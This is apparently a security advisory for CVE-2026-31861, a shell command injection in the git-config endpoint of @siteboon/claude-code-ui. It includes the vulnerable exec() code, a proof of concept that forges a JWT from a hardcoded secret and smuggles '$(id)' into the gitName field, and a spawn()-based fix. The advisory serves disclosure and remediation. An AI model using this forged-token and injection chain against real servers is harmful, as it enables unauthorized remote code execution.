CVE-2026-31861
@siteboon/claude-code-ui is Vulnerable to Shell Command Injection in Git Routes
Description
# Shell Command Injection in User Git Config Endpoint | Field | Value | |-------|-------| | **Severity** | High | | **CVSS 3.1** | 8.8 (High) — when chained with VULN-01 | | **CWE** | CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | | **Attack Vector** | Network | | **Authentication** | JWT required (bypassable via VULN-01) | | **Affected Files** | `server/routes/user.js` (lines 58-59) | ## Description The `/api/user/git-config` endpoint constructs shell commands by interpolating user-supplied `gitName` and `gitEmail` values into command strings passed to `child_process.exec()`. The input is placed within double quotes and only `"` is escaped, but backticks (`` ` ``), `$()` command substitution, and `\` sequences are all interpreted within double-quoted strings in bash. This allows authenticated attackers to execute arbitrary OS commands via the git configuration endpoint. ## Root Cause `server/routes/user.js` lines 58-59: ```javascript await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`); await execAsync(`git config --global user.email "${gitEmail.replace(/"/g, '\\"')}"`); ``` Only `"` is escaped. However, within double-quoted bash strings, the following are still interpreted: - `` `malicious_command` `` — backtick execution - `$(malicious_command)` — subshell execution ## Impact - **Remote Code Execution (RCE)** — arbitrary OS commands execute as the Node.js process user - The `git config --global` vector modifies the **server-wide** git configuration, affecting all git operations - When chained with VULN-01 (hardcoded JWT), this is fully **unauthenticated RCE** - Attacker can: read/write any file, install backdoors, pivot to other systems, exfiltrate data ## Proof of Concept ```bash # Step 1: Forge a JWT (see VULN-01) TOKEN=$(python3 -c "import jwt; print(jwt.encode({'userId':1,'username':'admin'}, 'claude-ui-dev-secret-change-in-production', algorithm='HS256'))") # Step 2: Inject via gitName using command substitution curl -X POST "http://REDACTED:5173/api/user/git-config" \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"gitName":"$(id)","gitEmail":"[email protected]"}' ``` The server executes: ``` git config --global user.name "$(id)" ``` Bash evaluates `$(id)` before passing it to git, executing the `id` command and setting the username to the output. ## Remediation Replace `exec()` with `spawn()` (array arguments, no shell): ```javascript // BEFORE (vulnerable): await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`); // AFTER (safe): await spawnAsync('git', ['config', '--global', 'user.name', gitName]); await spawnAsync('git', ['config', '--global', 'user.email', gitEmail]); ```